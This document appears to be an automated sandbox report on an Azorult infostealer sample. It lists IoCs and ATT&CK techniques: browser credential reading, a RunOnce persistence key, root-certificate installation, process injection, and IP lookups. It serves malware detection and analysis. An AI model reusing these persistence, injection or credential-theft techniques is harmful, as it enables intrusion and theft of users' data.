azorult | 9e4459dc55ef82ee1bcd9f64ea3005747d3334ce1e2d60a8b2ee3d3fbef48dfb

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp

Loads dropped DLL 7 IoCs

pid	Process
220	setups.tmp
220	setups.tmp
220	setups.tmp
220	setups.tmp
220	setups.tmp
220	setups.tmp
220	setups.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ay24x5xnjjp = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\A8V0Y2SX2U\\multitimer.exe\" 1 3.1617432411.60680f5b14397"	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	app.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 14 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
94	api.ipify.org
192	ip-api.com
218	api.ipify.org
634	ipinfo.io
636	api.ipify.org
347	ipinfo.io
113	ipinfo.io
355	ipinfo.io
111	ipinfo.io
253	api.ipify.org
507	ipinfo.io
522	ipinfo.io
537	api.ipify.org
654	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1220 set thread context of 2208	1220	key.exe	89

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	svchost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 18 IoCs

pid	pid_target	Process	procid_target
6112	4484	WerFault.exe	152
6528	5756	WerFault.exe	163
1636	5756	WerFault.exe	163
4532	5756	WerFault.exe	163
7148	5756	WerFault.exe	163
6612	5756	WerFault.exe	163
7460	5756	WerFault.exe	163
6564	5756	WerFault.exe	163
8184	5756	WerFault.exe	163
1736	5756	WerFault.exe	163
1772	7736	WerFault.exe	241
7844	5756	WerFault.exe	163
6176	5756	WerFault.exe	163
6876	5756	WerFault.exe	163
7692	5756	WerFault.exe	163
3488	2108	WerFault.exe	154
7732	1816	WerFault.exe	539
9108	6908	WerFault.exe	541

Delays execution with timeout.exe 13 IoCs

evasion

pid	Process
2644	timeout.exe
5812	timeout.exe
8340	timeout.exe
8120	timeout.exe
4380	timeout.exe
8376	timeout.exe
8308	timeout.exe
8256	timeout.exe
5800	timeout.exe
7800	timeout.exe
9016	timeout.exe
6476	timeout.exe
2840	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
7316	taskkill.exe
7832	taskkill.exe
3948	taskkill.exe
6912	taskkill.exe
6276	taskkill.exe
4696	taskkill.exe
9568	taskkill.exe
3524	taskkill.exe
7884	taskkill.exe
8964	taskkill.exe
9140	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	Process not Found

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000004748cfbb6525eb8a64229dde9ce36260c163389aa7c7f38c394c6a979689c804d998943dd02268e3ed2147730404e99bf61dfb627b9a843b97ed55a04ca3f52e0132f1205b48885a05e73dbe0ccb35bcea3a697af355045e111	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7ab6cd9f5528d701	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000002d19121e3d4727c017b95004966f898f0528f021c16af9dc825ed5e93e4f4a0b1419018986e70bfb39f80def6a26d5b52dc9f9b1fdeb79e418be	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	app.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	app.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000901e209b128394120e2073c425e253ac50ccabe9c589654a6fdde3b6373e96fa230757b48de8df56a19027a348b522f6aff33c99ab334dd4c17e6694cc79e42117f58568053f5682db2c84f3b300f786c9af7673261fc4704f5debd20bfee56caa07c1ab4e272ca2e31534d5dd65f22a2c21ff8b3feb89740699c6c2b16b83feb05f2cd5b33f1869aa6b3ff9c58338297467cc9a6738e819e75136937e6271b0791c2c3315299a73c94e55149bfac0978fa2a2f6caa6e48a25a75533c5815767775ed8f02e8410998ddee073f36a284445f314e4f1d516fdb3b95802d869c10b3945154ae9ef124f803b6249387368270d78452fdf6551db26a9d64e51bb0f04d0f0ad0f530c071bca858a1911b5126fe452231a3df7cffe819541aace153842b6814b7c9279b016b5dccc412ed0f413b1a1a1995c2968fc579f0e064219f5e45f172e589ed8257fa9601b3d546481fb4786e1df039cf27bcce586a7fa65de620ed2896f04c8535baf310bc1661118b7091fad391af013a534893ae5839a6a4c83d1405586e8582a896f3aa2787780c2b68d513da9c5f19ab4fdafc81a7605d3ce018853a8be	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{138F9D25-AA1B-4D75-B11D-90E7D5F24070}"	svchost.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
2256	PING.EXE
5544	PING.EXE
3744	PING.EXE
832	PING.EXE
2716	PING.EXE
8532	PING.EXE

Script User-Agent 12 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	641	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	505	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	520	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	632	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	359	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	513	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	528	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	653	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	655	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	112	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	118	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	352	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
220	setups.tmp
220	setups.tmp
4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe
4652	multitimer.exe
